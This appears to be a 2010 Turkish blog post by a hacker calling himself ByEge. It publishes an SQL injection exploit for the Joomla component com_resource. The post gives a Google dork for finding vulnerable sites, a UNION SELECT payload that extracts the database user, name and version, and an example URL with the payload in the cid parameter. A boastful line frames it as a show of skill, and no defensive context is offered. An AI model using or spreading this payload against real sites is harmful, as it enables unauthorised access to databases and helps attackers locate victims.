16 Mayıs 2010 Pazar

Joomla Component com_resource SQL Injection

 BİZE SOSYAL MUHENDİSLİKTEN  BASKA BİR BOK BİLMİYORSUNUZ  DİYENLERE KAPAK OLSUN

[!] Title: Joomla Component com_resource SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]##########################################[+]


[!]  Google Dork : inurl:com_resource

[!]  ExploiT     :

-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_resource&view=single&cid[]=-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--


[+]##########################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Hiç yorum yok :

Yorum Gönder